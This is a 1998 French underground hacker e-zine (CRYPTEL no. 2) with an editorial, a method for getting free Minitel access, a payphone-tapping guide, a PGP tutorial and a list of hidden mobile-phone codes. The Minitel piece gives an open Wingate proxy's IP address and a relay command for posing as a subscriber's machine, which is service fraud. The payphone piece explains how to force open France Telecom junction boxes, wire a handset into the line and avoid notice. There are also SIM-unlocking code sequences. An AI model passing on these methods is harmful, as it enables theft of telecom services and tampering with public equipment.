
             __  __  _ _  __  ____  __  _                
            / _)/  )( | )/  \(_  _)/ _)/ )2          
           ( (_(   \ \ /( ()_) )( (  _| (_             
            \__)\_\_)(_) \_)  (_ ) \__)\__)          
                                                  
                    >> 10110101| <<                                       
                                                       
                       e-z-i-n-e 

                 u-n-d-e-r-g-r-o-u-n-d                                                                                             

                 l-i-b-e-r-a-l-i-s-t-e                                             
                                                       
                                                       
                                                       
        EDITION No 2 / Decembre 1998 /  CRYPTEL    


 > staff: Editeur  / vatoo
         Ecrivains \ vatoo          [vatoo75@altern.org]
                    \ aaah          [Aaah@mail.dotcom.fr] 
                     \ ced99        [ced99@club-internet.fr]
                      \ cyberjunk   [Snipper@hotmail.com] 
                       \ pr0tek     [pr0tekti0n@hotmail.com]

________________
>> Avertissement: 

      L' organisation CRYPTEL a crit ce texte dans 
   le but UNIQUE d' informer les gens. Ces quelques lignes 
   codes par des 1 et des 0 ne sont donc qu'  prendre d' un
   point de vue ducatif. Ce texte n' est pas illgal, c' est 
   son application qui l' est, alors soyez srieux, ne le 
   mettez pas en pratique, car vous pourriez tre poursuivis en
   justice et nous ne serions pas responsables de vos actes. L'
   information n' a jamais tu personne. Les actes, si.


__________
>>Sommaire:

  _________                         ________       ____
 / article \_______________________/ auteur \_____/ Ko \___
||
| 2.1  Edito                        vatoo            3     |
| 2.2  Minitel gratuit              aaah             5     |
| 2.3  Phreak cabines FT            aaah             5     |
| 2.4  Email & securite             pr0tek          22     |
| 2.5  Secrets of 30 GSM            vatoo           25     |
| 2.6  Introduction a Win NT        cyberjunk       19     |
| 2.7  Prefixes nationaux           vatoo            3     |
| 2.8  Password files               aaah             4     |
| 2.9  Elephant bleu                ced99            4     |
| 2.10 GSM a la loupe               vatoo           15     |
| 2.11 Trashing reports             aaah            12     |
| 2.12 Paris Underground            vatoo           24     | 
| 2.13 Ze End                       vatoo            ?     |
|__________________________________________________________|
''


______________
2.1>>Editorial: 

Decembre 1998...a l' aube de l' an 2000! Et dire que dans quelques jours, 
nous allons passer en 1999, numero qui marque les esprits, meme les plus 
incredules. Comment rester indifferent face a ce que represente le futur 
passage de millenaire? C' est un changement purement psychologique, mais 
deja, l' arrivee en 1999 va nous faire prendre conscience que notre 
societe n' est pas a la hauteur de notre epoque. Les francais vont devoir 
changer d' etat d' esprit, ne plus rester les conservateurs franchouillards 
qu' ils ont ete jusqu' a present. 
Le temps est venu a la vulgarisation des technologies (comme le net, un peu 
nouveau pour les francais, alors qu' il existe depuis presque 40 ans!), 
avec un droit a l' information plus important pour le citoyen.
La lutte contre le fascisme et l' intolerance vont etre decisives pour 
l' avenir de notre societe. Si les conditions de vie ne plaisent pas plus 
aux francais, la montee du FN va continuer jusqu' a ce qu' il soit trop 
tard pour faire marche arriere. C' est a present qu' il faut reagir, et 
se battre pour ses ideaux. Soyez pour la liberte d' expression, la tolerance, 
et montrez-le au quotidien. Il faut se dire que ce n' est pas en attendant 
la reaction des autres que la situation va changer. Le Nouveau Digital 
Underground Francais est la pour soutenir cette position, surtout dans les 
moments les plus delicats.

Passons a des choses un peu moins serieuses: la deuxieme edition de notre 
ezine, que vous tenez entre vos disques durs. Notre equipe a essaye de 
faire un mag encore plus complet et plus precis pour satisfaire votre soif 
cannibale de connaissances. Je dirais meme qu' on s' est bien dechires 
pour vous fournir ce numero. Nous avons essaye de rester originaux, et ne pas 
remixer des articles deja traites de nombreuses fois. Cela va d' une visite 
des catacombes parisiennes au phreak de cabines FT(exclu), en passant par 
les secrets de 30 GSM, ou bien encore le trash d' une agence FT.
Vous avez surement remarque que des auteurs sont apparus, comme Le Saint 
(alias Cyberjunk), ced99 ou pr0tek. En fait ils ont ecrit pour le #2 en tant 
qu' auteurs ponctuels (mis a part ced), et peuvent apparaitre encore dans les 
editions a venir, ca ne depend que d' eux.

On souhaite sincerement que ce numero vous apporte quelque chose. Nous sommes 
toujours tres interesses par vos creations (articles, scans de pbx, vmb, passwords,
ou autres delires..). On attend aussi vos reactions, vos critiques, vos injures sur 
ce file, et eventuellement vos remerciements!

En tout cas, toute l' equipe de CRYPTEL exige que vous passiez un reveillon du 
jour de l' an terrible a ne pas vous en remettre pendant 3 jours, si vous voyez 
ce que je veux dire ;)


(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )     Minitel GRATOS ?!     )    2.2    (    Aaah@mail.dotcom.fr    (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


En lisant les newsgroups j'ai trouv un post assez interressant sur le minitel 
la technique semble valide et FT est parait il au courant du problme. Si j'ai 
plus d'infos vous cryptel vous en serez inform :

a y est, c'est confirm, on peut avoir le minitel gratuit (communications 
incluses) grce  France Telecom Interactive (la bote qui s'occupe de Wanadoo & 
compagnie). La dmarche est trs simple, mais ncessite tout de mme du logiciel 
(UNIX me parat particulirement adapt ;)
Le principe : FTI permet  ses abonns d'avoir accs au minitel via Internet 
moyennant un petit abonnement. L'heureux abonn, quand il se connecte au serveur 
web de wanadoo (www.wanadoo.fr ) voit alors apparatre une rubrique Minitel, et 
tous les frais normalement reverss au prestataire de service seront dbits sur 
une petite note qui viendra avec la facture Wanadoo pour l'abonnement  Internet.

Hum, mais comment cela marche-t-il? Pourquoi certains ont-ils cette rubrique 
Minitel et pas d'autres? Le serveur Web wanadoo "sait" quelles sont les adresses 
IP pouvant accder  un service, et lesquelles n'y ont pas droit.
L o a devient intressant, c'est que certaines botes, trop heureuses d'avoir 
le Turbowanadoo (le nom de la formule ADSL "internet rapide"), veulent pouvoir 
en profiter depuis tout le rseau local. Et, sur le conseil de FTI (j'insiste sur 
ce point), elles installent Wingate (les techniciens de chez FTI connaissent mal 
Linux, de leur propre aveu, et Wingate a le mrite d'tre bon march).

Prparez les mouchoirs, car par dfaut (et les valeurs par dfaut ne sont pas 
changes dans 90% des cas), Wingate offre un service de redirection telnet 
absolument merveilleux. Pour s'en convaincre, essayez de faire un petit "telnet 
193.252.178.17". A l'invite Wingate, tapez (par exemple) "nephtys.lip6.fr 23". 
Nous sommes alors connects au service ftp de jussieu, mais en passant par le 
Wingate. Jussieu a l'impression que c'est la machine hbergeant le Wingate qui 
appelle.

Bien. Le proxy http des ADSL est 193.252.178.5, port 8888. Il reste donc  crire 
un petit programme qui, recevant une connexion sur le port (mettons) 3000, va 
contacter 193.252.178.17, et entrer la chane de caractres "193.252.178.5 8888" 
et ensuite, se contenter de faire la FIFO entre le flux de la connexion entrante 
sur le port 3000 et le flux de la connexion sortante vers le Wingate. Je suggre 
l'utilisation des outils "hose" et "faucet", qui redirigent des sockets TCP/IP 
vers les entres/sorties standard. La ligne  taper ressemblera  "hose 3000 -c sh 
faucet 193.252.178.17 (echo 193.252.178.5 8888 ) -slave -in -out"... bon je n'ai 
pas mes manpages sous la main, c'est assez proche.

On lance cette commande sur une bcane (disons toto). Ensuite, dans votre brouteur 
favori,  la ligne "proxy", mettez l'adresse toto, port 3000. Et zou. Maintenant, 
vous accdez  Internet, mais exactement comme si vous tiez sur la machine 
hbergeant le Winproxy. Le proxy de chez FTI croira que l'appel vient de la bcane 
du Winproxy, et autorisera donc l'accs au minitel.

Bon, le seul "hic" c'est que si a se trouve, je vous ai donn l'adresse d'un 
Winproxy qui n'a pas pris l'option Minitel. Qui sait? En tout cas, la technique ne 
se restreint pas aux lignes ADSL, les accs PPP standard peuvent eux aussi tre des 
cibles.

                                  -=-
Aaah@mail.dotcom.fr



(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )        Phreak cabine FT   )    2.3     (    Aaah@mail.dotcom.fr   (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


Mardi 14 Octobre je suis dans une cabine tlphonique entrain de tlphoner 
(non sans blagues ? ;-) mes cls tombent par terre, je m'accroupis pour les 
ramasser et l au surprise je remarque le jackpot
 
                 ----------------------------------
                 |                                |
                 |                                |
                 |                                |
                 |   */Voir Photo cabine.jpg*/    |
                 |                                |
                 |                                |
                 |                                |
                 ----------------------------------

Et oui il est l :-) tout bte et sous nos yeux. C'est une boitier en fer ferm 
par 2 points : un en haut et un en bas. Pour ouvrir ce boitier 2 manieres s'ouvrent 
 toi :

       * Tu es un bourrin, prenez une pince CROCO et essayer de forcer
       * Tu fais dans la finesse et le raffinement, tu achetes une cl passe                                    
         EDF/GDF attention ce type de cl ne se trouve que dans les bonnes 
         quincailleries (70 frs environ) inutile de te pointer chez 
         CASTORAMA ou autres et demander ce type de cl ... Voil  quoi a
         ressemble 

                 ----------------------------------
                 |                                |
                 |                                |
                 |                                |
                 |     */Voir Photo cle.jpg*/     |
                 |                                |
                 |                                |
                 |                                |
                 ----------------------------------
 
Moteur.... ACTION ! Voil maintenant comment je te conseille de procder. Prends 
un sac  dos et met z'y un tlphone tout bete avec sa prise dnud (cad vous 
virez l'embout il ne faut garder que le fil) un petit tournevis plat, la pince 
croco ou le passe EDF et partez en qute d'un cabine FT isol (pas sur les champs 
lyses). Une fois dedans tu ouvres la boite (tous tes instruments sont cachs dans 
le sac  tes pieds) et voil ce que tu trouves 

                 ----------------------------------
                 |                                |
                 |                                |
                 |                                |
                 |   */Voir Photo boitier.jpg*/   |
                 |                                |
                 |                                |
                 |                                |
                 ----------------------------------

La premire chose que tu fais tu coupes le disjoncteur comme a la lumire de la 
cabine sera teinte tu seras plus au calme pour oprer et moins exposer aux regards. 
Ensuite la partie qui nous interresse c'est celle avec les fils de plusieurs couleurs 
raccorde a plusieurs bouts rouges. A partir de l tu es un grand garon tu prends 
ton tlphone, ton tournevis et tu fous les fils de ta ligne tel dans ce de la cabine. 
Respecte bien les couleurs. Une fois fait bah BINGO tu as un tel gratos raccord a une 
ligne France Telecom tu dtournes une grosse bote plutt qu'un pauvre particulier 
c'est bien mieux. Un autre dbouch s'ouvre  toi tu fous une black box et on t'appelle 
gratos sur une ligne propre  FT donc tu t'en fous des moins de 4 min puisque meme si 
les commutateurs reperent la couille ils vont surveiller leur propre ligne :-) lol.


Quelques remarques en VRAC :
****************************
@ Le contenu des boitiers varie celon le type de cabine. Tu peux tomber sur un type 
de boitier avec un cache pot gris qui protge le raccordement pour l'ouvrir 2 
solutions : tu l'arraches (mais a craint un peu ...) tu essayes de dviser la vis 
qui est en fait un minuscule point, pour a tu prends une pointe de clou tu enfonces 
bien et tu dvises ... NB: Ce type de boitier est quand meme rare.

@ Changer rgulirement de cabine on ne sait jamais 

@ Pour savoir si quelqu'un a ouvert le boitier suite  votre passage mettez avant de 
partir un petit bout de scotch sur la fente du boitier comme a si a votre prochain 
passage il n'y est plus c'est que quelqu'un est pass par l ...

                                  -=-

Si quelqu'un fait du lock picking, possede des passes france telecom (cabine, rpartiteur, 
etc...) je suis TRES interress mailez-moi Aaah@mail.dotcom.fr On compte sur vous car on 
va pas tout faire nous mme, participez c'est cool et on est ouvert  toutes vos 
propositions.



(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )     Email & securite      )    2.4     (  pr0tekti0n@hotmail.com  (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


Ce texte est rserv aux personne ayant de grandes connaissances dans le domaine "Internet".


Introduction

Avec l'utilisation toujours croissante du courrier lectronique (E-Mail) comme mode de com-
munication sur Internet ainsi que d'autres services, la scurit de ce type de courrier devient
de plus en plus importante. De nombreux utilisateurs se posent des questions telles que: 

Q: Peux-on intercepter le courrier lectronique ?

R: Oui, l' E-mail n'est pas sur. Il est possible d'intercepter des messages lctroniques.

Q: Peux-on envoyer du courrier lectronique sous un faux nom ?

R: Oui, toute personne peux masquer son identit sur le Net.

Internet et les services de courrier lectronique que l'on peux y trouver ne sont pas surs!
A travers ce document, vous pourrez dcouvrir pourquoi les services mail ne sont pas surs et 
comment y remdier.

1) Les E-Mail privs.

Imaginons que vous vous serviez du courrier lectronique pour envoyer des messages dans une 
entreprise. Il se pourait qu'au cours de cette courte correspondance, vous changiez des 
dtails intimes (je sais pas moi, une dclaration d'amour :) ). Votre employeur n'aurait 
aucune difficult  les lire...
Tenez-vous rellement  ce que votre employeur soit parfaitement au courrant de votre vie 
prive?
Si c'est non (enfin j'espere), il est ncessaire que vous protgiez vos lettres des regards 
indiscrets.

2) Probleme de scurit.

Les informations transmises par courrier lectronique sur Internet le sont en texte clair. 
Ces textes sont stocks sur n'importe quel ordinateur Internet. Ils sont tenus  la disposition 
du destinataire pour qu'il les recoive sur simple demande. Voila pourquoi les personnes 
indiscretes disposent de multiples occasions pour lire les messages d'autres utilisataires.
En fait, ces "voyeurs" doivent accder  des parties dtermines sur un rseau:

- Le courrier lectronique est la plupart du temps transmis via le SMTP (simple mail transfert 
protocol). Lors de cette transmission, des paquets de donnes sont envoyes sur un rseau 
(Internet). 
Tres souvent, l' E-Mail n'est pas directement transmis au destinataire mais sauvegard 
temporairement.
Votre E-Mail restera un certains temps sur un serveur, en clair!
C'est bien sur  ce moment l que les messages peuvent etre lus et copier par des responsables 
du serveur ou par des hackers. 
On pourrait se demander alors si des messages sont lus sur Internet et combien...

3) Identification.

Bien que tous les E-Mail disposent d'une adresse d'expditeur, cette information n'est pas 
fiable!
Il est facile de s'amuser  envoyer des messages sous un faux nom (ceci est expliqu dans de 
nombreux zine de hacking tels Frhack, allez sur www.multimania.com/gripsou/ ).
Suivre des messages reste possible jusqu' un certain point.
Quand une communication est transmise via divers ordinateurs, c'est  peine si l'on sait 
rellement d'ou elle vient  l'arrive.
Il est donc presque impossible de distinguer si un E-Mail est, dans l'tat prsent, un original
ou ce que l'on pourrait appeler "falsification".

4) Codage d' E-Mail.

Il existe de nombreux systemes de codage qui permettent, jusqu' un certain point, de garantir 
fiabilit et authenticit. En fait, aucun programme ne peut  ce jour garantir 100 % de 
scurit.
Dans le cas le plus simple, l'expditeur et le destinataire s'accordent sur une "cl" 
dtermine.
De tels procds que si vous disposez d'un moyen de communication sur pour vous mettre d'accord 
sur une cl (ne faite pas ca sur IRC), et notre bon vieux tlphone n'est pas plus sur qu'une 
lettre...

5) Systeme  cl publique.

Puisqu'il est rare de trouver une voie de communication sure, d'autre proceds de codage 
permettant la transmition de la fameuse cl sont tres souvent utiliss de nos jours. Chaque 
utilisateur cre deux cls: La premiere est communique de facon "publique". Grace  cette cl
toutes les autres personnes chiffrent le courrier destin  un correspondant.
Ce n'est qu'avec la seconde cl perso que le correspondant pourra dchiffrer son courrier:
C'est la raison pour laquelle cette cl personnelle doit etre secrete.
Voici un shema, je ne suis pas tres fort en dessin...



|------------|
| Expditeur |________________________________________________ --------------
|----------- |                                                 |Destinataire|
        |                                                      --------------     
 -------------        _________________________________________________|
 |  Fichier  |       |                                                 |
 -------------      CLE                                                |
        |            |                                                 |
        |            |                                                 |
        |            |                                                 |
 ------------        |                                                 |
 |  Envois  |________|                                                 |
 ------------                                                          |
        |                                                              |
        |                   ----------      ----------                 |
        |___________________|Internet|_____| Envois| __________________| 
                            ----------      ----------


6) PGP

PGP- Pretty Good Privacy est le systeme  cl publique le plus rpendu. Il permet:

- De coder des lettres.

- De les signer lectroniquement.

Une signature letronique garantit qu'un courrier a rellement t rdig par une personne 
dtermine.
Pour vrifier l'authenticit d'une signature, le destinataire utilise pour le dcodage la cl 
publique.
Si le dchiffrage du courier ne peux etre effectu; cela signifie que le message a t 
manipul.

7) PGP suite

A partir d'un message que l'on aura sign, on cre un "extrait" ayant les caractristiques de 
ce message.
Cet "extrait" est ensuite cod  l'aide de la cl et transmis avec le courrier si le 
destinataire veut vrifier l'authenticit de la signature, il doit dchiffrer l'extrait 
cod au moyen de la cl publique de l'expditeur et doit crer un autre extrait (et oui...) 
du courrier lisible. Si les deux extraits se recoupent, l'authenticit du courrier et 
dmontre.
Cette methode, disponible dans PGP (le logiciel), permet aux utilisateurs ne possdant pas 
PGP (oui et ils ne sont pas rares :( ... )de lire des courriers signs.

8) Cl PGP.

Bien que les possibilits de PGP prsentes ici nous permettent dj de coder et de signer des 
messages, d'autres questions se posent. La premiere concerne la maniere dont une personne peut
faire parvenir un message chiffr  un autre utilisateur avec lequel elle n'a encore aucun 
contact... il ne faut pas oublier que la cl doit rester secrete...
Prennons un exemple:

Une personne A boudrait communiquer avec une peronne B qu'il ne connait pas encore.
Si A voulait communiquer avec B, il lui demanderait d'abord sa cl publique.
Et si une personne C pouvait intercepter ce message et envoyer  la place de B, une rponse 
avec une fausse cl, C serait alors le seul  pouvoir lire ces lettre.
A penserait communiquer avec B alors qu'elle communiquerait avec C...
Comment peut on alors reduire cette possibilit d'aggression ?

9) Serveur de Cl.

            
   ______________                      ______________                    _______________
   |            |                      |            |                    |             |
   | Personne A |                      | Personne B |                    | Personne C  |
   |____________|                      |____________|                    |_____________|
         |                                   |                               |      
         |                                   |                               |
         |                                   |                               |
  _______|__________                         |                            ___|  
  |                 |                 _______|___________          _______|___________         
  | Cl publique    |                 |                 |          |                 |
  |_________________|                 | Cl publique    |          | Utilisation de  |
         |                            |_________________|          |  la cl de A    |
         |                                   |                     |_________________| 
         |            _______________________|                            |
         |___________|                                                    |
              _______|__________                                          |
              |                |                                   _______|__________      
              | Acces Internet |                                   |                |
              |________________|                                   | Acces Internet |
                      |                                            |________________|
                      |                                                |          |
                      |                                                |          |
               _______|__________                                      |          |
               |                |______________________________________|          |
               | Serveur Cl    |                                                 |
               |________________|_________________________________________________|
                                       |                 |
                                       | Cl publique    | 
                                       |_________________|



Les serveurs de cls sont des ordinateurs d'acces public, qui recuillent des cls publiques et
qui les envoient sur demande (sympas non ?). Toute personne peut donc y trouver des cls 
publiques des autres utilisateurs (seulement si ils sont enregistrs).

Les serveurs de cls pourraient pour etre pris en otage par des hackers, ne l'oublions pas...


10) La "chaine" de confiance.

Le principe sur lequel elle est fonde est le suivant: des personnes qui se connaissent ou 
bien, qui sont sure de l'existence relle de l'autre, signent leur cls publiques.


   ______________                                     ______________
   |            |               Confiance             |            |                    
   | Personne A |-----------------><------------------| Personne B |                    
   |____________|                 :)                  |____________|                    
         |                                                  |
         |                                                  |
         |                                                  | 
   ______|_______                                   ________|______        
   |            |           ________________       |              |
   | Cl prive |___________|              |_______| Cl publique |              
   |____________|           | Logiciel PGP |       |______________| 
                            |______________|    
 

La signature d'une cl correspond  celle d'un message. Si B dsire signer la cl publique 
de A, alors il la code avec sa propre cl prive.

Une chaine de confiance est cre quand de nombreux utilisateurs PGP signent entre eux des cls
publiques.

11) "Empreintes digitales".

Toute cl publique PGP sera clairement marque d'une "empreinte digitale". Une telle empreinte 
est aussi unique que chaque cl. Elle permet d'attribuer de maniere fiable une cl PGP  une
personne. Par exemple, si une personne vous transmet son empreinte digitale, vous serez certain
que la cl est bien la sienne. Il faut bien sur que la personne puisse vous envoyer ses 
empreintes digitales :) ...

12) Scurit avec PGP.

La fiabilit de codage tel que PGP repose sur l'importance des moyens que devrait employer un
agresseur pour calculer la cl prive. En effet il existe des "cracker PGP", vous pourrez vous
en procurer tres certainement sur http://neworder.box.sk
Sachez qu'il aura fallu 8 mois  une organisation pour cracker une telle cl...
Ceci devrez vous donnez une ide des moyens qu'il faudrait utiliser pour casser une cl...

13) Logiciels PGP (enfin!).

Il existe diffrentes versions de PGP:

- Des versions non commerciales pour un usage aux Etats-Unis et le Canada UNIQUEMENT.

- Des versions commerciales pour les E-U et le Canada.

- Des versions internationnales non commerciales.

L'utilisation de PGP est  priori illgale car:

- L'un des deux procds de cryptographie employ dans PGP,  savoir RSA, ne peux etre utiliser
  qu'aux Etats-Unis.

- En Europe, l'usage non commercial de PGP est normalement possible puisque le code source 
  RSA a t export illgalement des Etats-Unis.

14) Installation de PGP sous DOS!


PGP est autant un programme excutable dispo pour de nombreux sytemes en source C.
Si vous tlchagez un programme PGP, vous aurez les fichiers suivants:

______________________________________________________________________________________________
|                 |                                                                          |
| Nom du fichier  |                   Contenu du fichier                                     |
|_________________|__________________________________________________________________________|    
|                 |                                                                          |   
|  pgp.exe        |    Programme excutable                                                  |
|_________________|__________________________________________________________________________|
|                 |                                                                          |
|  config.txt     |    Fichier de configuration pour PGP                                     |
|_________________|__________________________________________________________________________|
|                 |                                                                          |
| setup.doc       |    Remarques sur la config de PGP                                        |
|_________________|__________________________________________________________________________|
|                 |                                                                          |
| pgpdoc1.txt     |    La doc officielle de PGP                                              |
|_________________|__________________________________________________________________________|

Lisez premierement toutes les infos des fichiers txt et doc.
Ajoutez ensuites ces lignes dans votre fichier autoexec.bat:

SET PGPPATH=C:le_rep_ou_vous_avez_mis_PGP
SET PATH=C:le_rep_ou_vous_avez_mis_PGP;%PATH%
SET TZ=MET-1DST

TZ correspond  Time Zone.


Info sur le config.txt

Dans le tableau suivant, vous trouverez les parametres importants:

______________________________________________________________________________________________
|                      |                                                                     |
| Parametre            |                   Remarque                                          |
|______________________|_____________________________________________________________________|    
|                      |                                                                     |   
|  MyName = "Dupond"   |   Vous devez bien sur mettre votre nom                              |
|______________________|_____________________________________________________________________|
|                      |                                                                     |
|  Language = fr       |   Langue  choisir                                                  |
|______________________|_____________________________________________________________________|
|                      |                                                                     |
| Armor = on           |   Activer le PGP pour coder vos e-mail                              |
|______________________|_____________________________________________________________________|

Si vous dsirez utiliser PGP sur un autre syteme, lisez bien le CONFIG.TXT.

15) PGP "Keyrings".

PGP utilise deux fichiers pour la mmorisation des cls: pubring.pgp et secring.pgp
Il inscrit les cls publiques de vos correspondants dans le pubring.pgp . Ce fichier n'est pas
"sensible". En revanche le secring.pgp est TRES important puisque c'est dedant qu'est inscrite
votre cl prive!
Mettez donc plutot ce fichier sur disquette que vous conserverez en lieu sur.
Vous devez aussi protger le fichier randseed.bin qui est aussi important.

Des que vous aurez paramtr PGP et protg vos petits fichiers, vous pourrez commencer  
utiliser PGP.

16) Dduter.

Q: Comment crer une cl personnelle ?

R: tapez: "pgp -kg" le programme vous demandera aussi la longeur de la cl:

   Pick your RSA key size:
   1) 512 bits- Low commercial grade, fast but less secure
   2) 768 bits- High commercial grade, medium fast, medium speed, good security
   3) 1024 bites- "Military" grade, slow, highest security
   Choose 1, 2 or 3 enter desired number of bits:

   Je vous conseille de prendre le 2), une cl normale, bien que le 1) soit suffisant.
   Un identificateur de cl vous sera demand:

   You need a user ID for your public key. The desired form for this
   user ID is your name, fallowed by your E-mail adress enclosed in
   ngle brackets, if you have an E-mail adress.
   For example: Daniel, Dupond .dupond@cool.fr
   Enter a user ID for your public key:

   Et maintenant le mot de passe:

   You need a pass phrase to protect your RSA secret key.  
   Your pass phrase can be any sentence or phrase and may have many
   words, spaces, punctuation, or any other printable characters.
   Enter your phrase here:
   
   ATTENTION: Ce mot de passe est tres important pour la protection de votre cl!

   Apres le mot de passe on vous demande de tapez n'importe quoi:

   We need to generate 968 random bits. This is done by measuring the
   time intervals between your keystrokes. Please enter some random text
   on your keyboard until you hear the beep:

   Vous avec maintenant crer votre cl, entrez ceci pour avoir des infos sur votre cl:
   "pgp -kvvc"

   Vous obtiendrez:

   Key ring:"pubring.pgp"
   Type Byte/KeyID  Date   UserID
   pub 1024/DDB189E1      1998/12/24 Test-Key for Daniel Dupond
         Key fingerprint = 54 6D C8 D4 98 F9 A3 55 55 AE 1A 69
   sig    DDB189E1   Test-Key for Daniel Dupond
   1 matching found

17) Comment crypter et dcrypter des messages.

Crez d'abord le fichier que vous voulez crypter. Ex: test.txt

Pour le codage tapez:
"pgp -eat test.txt"
Vous obtiendrez un fichier test.asc

Pour le dcryptage  tapez:
"pgp -d test.asc"


18) Les autres commandes PGP.

______________________________________________________________________________________________
|                      |                                                                     |
| Fonction PGP         |                   Commande                                          |
|______________________|_____________________________________________________________________|    
|                      |                                                                     |   
| Codage d'un texte    |   pgp -e{fichier texte} {ID du destinataire}                        |
| avec la cl du dest. |                                                                     |
|______________________|_____________________________________________________________________|
|                      |                                                                     |
|  Signature           |   pgp -s{fichier texte} [-u {votre ID}]                             |
|______________________|_____________________________________________________________________|
|                      |                                                                     |
| Dcodage d'un texte  |   pgp {fichier cod} [-o {fichier texte lisible}]                   |
| avec examen de la    |                                                                     |
| signature            |                                                                     |
|______________________|_____________________________________________________________________|


19) Source PGP et sites Internet

Serveur officiel: ftp://ftp.pgp.net/pub/pgp
Bon site en anglais bien sur:  http://www.pgp.com
Et bien sur en fancais:
http://www.yahoo.fr/Informatique_et_multimedia/Securite_et_cryptage/Pretty_Good_Privacy__PGP_/


20) Fin !!!

Voila c'est tout, si vous dsirez plus d'information ou de l'aide, n'hsitez pas  m'envoyer
un mail!

|Pr0teK|




(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 )      Secrets of 30 GSM    )    2.5    (           vatoo           (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


______________________
Alcatel One Touch Easy

Entrez 000000 et pressez *.
Le menu secret apparait.

TRACES Menu d' indicateurs de canaux
ARRETS - ?
VIDER ARRETS Pressez OK et le cell repond: 'This action is executed!'
CTRL CHARGE Montre la tension du chargeur et de la batterie.
DAMIER affiche le test.
Le Master Code pour le "MENU Code" et "Prod. code" de l' Alcatel One 
Touch Easy est 25228353.
La plupart des telephones ALCATEL sont 'SIM Locked', ils ne peuvent donc etre
utilises qu' avec une certaine tonalite. Ca ne peut etre desactive qu' en 
obtenant le code special par Alcatel, ou par votre fournisseur d' acces.
Il y a une rumeur komme koi un programme permettant de calculer le code a 
partir de l' IMEI, trainerait sur le net ;)

IMEI: 3300 1453 1139 420
Lorsqu' un cell est active avec une carte, ca donne:

"PRODUCT CODE"
"VAL. => OK"
Puis on entre 025121992, OK
"ENTER SPECIAL CODE"
**05* comme avec Motorola
"UNBLOCKING"
" PUK ? "
10608CC2*. Les 2 suivants fonctionnent aussi: 906081C2* 15900807*
"UNBLOCKING"
" PIN ? "
0000*
"UNBLOCKING"
"PIN AGAIN "
0000#

____________
ERICSSON 198

*#06# pour voir le numero IMEI

________________
ERICSSON 218/337

*#06# pour voir le numero IMEI
-> * <- <- * <- * CLR pour voir la version du software.
<- * * <- Pour activer la localisation de l' operateur (a utiliser avec precaution).
Il y a 5 essais pour y parvenir. Au dernier essai, le telephone beep pour avertir 
ke c' est le dernier essai..Un mauvais code vous fait sortir du menu, et vous aurez 
'Not allowed' inscrit sur le cadran. Un mode de test secret est accessible sir le 
GH337. Il y a deux methodes:
> * < < * > * montre la version du soft, comme 940810 1310
> * < < * < * montre la version du soft, comme 951024 1054
Apres etre entre dans ce mode, vous pouvez vous ballader avec les fleches < et > 
dans le menu. Chaque menu est different e fonction du type du software.

Commandes pour la version 940810 1310 :
TEXT CHECK - Montre 254 messages dans le langage courant
INIT EEPROM MMI - Initialise la configuration de l' utilisateur

Pour les versions plus recentes:
FLASH - Redemarre le telephone au moment ou l' on entre le numero de PIN.

Commandes pour la version 950626 1405 :
CXC (numero) - Le numero de production du soft. Le GH337/GF337 est toujours "CXC 125 005"
PRG - Indication pour la programmation

________________
ERICSSON 318/388

*#06# pour voir le numero IMEI
-> * <- <- * <- * CLR pour voir la version du software.

Pinout du GA628:
1: Chargeur. 
2: Entree Serie. 
3: GND 
4: Sortie Serie.  
5: Sortie +5V ? Sources au-dessus de 100 mA.
6: Entree Digitale.
7: Sortie Digitale. Haute lors de l' appel. 
8: Permet le micro et l' ecouteur externes, a connecter a un GND. 
9: GND 
10: Permet le micro et l' ecouteur externes, a connecter a un GND. 
11: Microphone externe. 
12: Haut-parleur externe, tres petit signal (10 mV).

Commandes d' Edition
AT+GMI  Identification du fabricant
AT+GMO  Identification du modele
AT+GMR  Identification de la derniere revision
AT+GMM
ATDxxx; Appeler le numero xxx 
ATH     Raccrocher le cell
AT+CFUN=? Definir les niveaux de fonctionnalite dans l' ordre de consommation d' energie. 
AT+CBC  Voir le niveau de la batterie. 


Caracteres SMS
				b7 	0 	0 	0 	0 	1 	1 	1 	1 
				b6 	0 	0 	1 	1 	0 	0 	1 	1 
				b5 	0 	1 	0 	1 	0 	1 	0 	1 
b4 	b3 	b2 	b1 	   	0 	1 	2 	3 	4 	5 	6 	7 
0 	0 	0 	0 	0 	SP 	D   	SP	0 	@ 	P 	 	p 
0 	0 	0 	1 	1 	 	SP	! 	1 	A 	Q 	a 	q 
0 	0 	1 	0 	2 	$ 	F   	" 	2 	B 	R 	b 	r 
0 	0 	1 	1 	3 	 	G   	# 	3 	C 	S 	c 	s 
0 	1 	0 	0 	4 	 	L  	$   	4 	D 	T 	d 	t 
0 	1 	0 	1 	5 	 	W	% 	5 	E 	U 	e 	u 
0 	1 	1 	0 	6 	 	P  	& 	6 	F 	V 	f 	v 
0 	1 	1 	1 	7 	 	Y   	' 	7 	G 	W 	g 	w 
1 	0 	0 	0 	8 	 	S 	( 	8 	H 	X 	h 	x 
1 	0 	0 	1 	9 	 	Q   	) 	9 	I 	Y 	i 	y 
1 	0 	1 	0 	10	LF	X   	* 	: 	J 	Z 	j 	z 
1 	0 	1 	1 	11	  	SP	+ 	; 	K 	 	k 	 
1 	1 	0 	0 	12	 	 	, 	< 	L 	 	l 	 
1 	1 	0 	1 	13	CR	 	- 	= 	M 	 	m 	 
1 	1 	1 	0 	14	 	 	. 	> 	N 	 	n 	 
1 	1 	1 	1 	15	 	 	/ 	? 	O 		o 	 

Notes:
SP Espace
LF Line feed
CR Carriage return

Menus caches
 Allez dans 'MissedCall'
 Pressez la fleche -> pendant une sec ou 2
 Le Menu d' options s' affiche
 Choisissez 'Yes'.

Essayez de taper ca: >*<<*<*
ou < est la fleche gauche et > la fleche droite

______________
ERICSSON GA628

*#06# pour voir le numero IMEI
-> * <- <- * <- * pour voir la version du soft
-> * <- <- * <- * -> pour lire tous les textes programmes
< * * < pour voir le status du reseau (attendre 3 s)
0 # pour appeler le dernier numero compose
* # 0 0 0 0 # pour initialiser le menu en anglais
Pour voir le niveau de la batterie quand le cell est eteint, pressez rapidement on/off.
